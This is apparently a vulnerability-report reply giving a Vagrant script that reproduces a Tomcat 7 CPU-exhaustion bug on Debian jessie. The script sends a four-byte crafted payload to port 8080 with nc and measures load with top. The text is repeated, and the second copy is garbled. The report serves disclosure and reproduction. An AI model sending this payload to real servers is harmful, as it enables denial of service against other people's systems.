Thanks Mark. Here I'm attaching another terminal session testing with debian/jessie which is also vulnerable.
Script used: mkdir debian-jessie-vagrant; \ cd debian-jessie-vagrant; \ vagrant init debian/jessie64; \ vagrant box update; \ vagrant up --provider virtualbox; \ vagrant ssh -c "sudo apt-get update; sudo apt-get -y dist-upgrade; sudo reboot"; \ sleep 30s; \ vagrant ssh -c "sudo apt-get -y install tomcat7; lsb_release -a; sudo service tomcat7 restart"; \ vagrant ssh -c "top -bn2 | awk '/^top/{i++}i>1' | head"; \ vagrant ssh -c "printf '\x05\x02\x00\x02' | nc -w 5 localhost 8080; top -bn2 | awk '/^top/{i++}i>1' | head"; \ vagrant ssh -c "sleep 5m; top -bn2 | awk '/^top/{i++}i>1' | head"; \ vagrant halt
Thanks Mark. Here I'm attaching another terminal session testing with debian/jessie which is also vulnerable.
Script used: jessie- vagrant; \ jessie- vagrant; \
mkdir debian-
cd debian-
vagrant init debian/jessie64; \
vagrant box update; \
vagrant up --provider virtualbox; \
vagrant ssh -c "sudo apt-get update; sudo apt-get -y dist-upgrade; sudo reboot"; \
sleep 30s; \
vagrant ssh -c "sudo apt-get -y install tomcat7; lsb_release -a; sudo service tomcat7 restart"; \
vagrant ssh -c "top -bn2 | awk '/^top/{i++}i>1' | head"; \
vagrant ssh -c "printf '\x05\x02\x00\x02' | nc -w 5 localhost 8080; top -bn2 | awk '/^top/{i++}i>1' | head"; \
vagrant ssh -c "sleep 5m; top -bn2 | awk '/^top/{i++}i>1' | head"; \
vagrant halt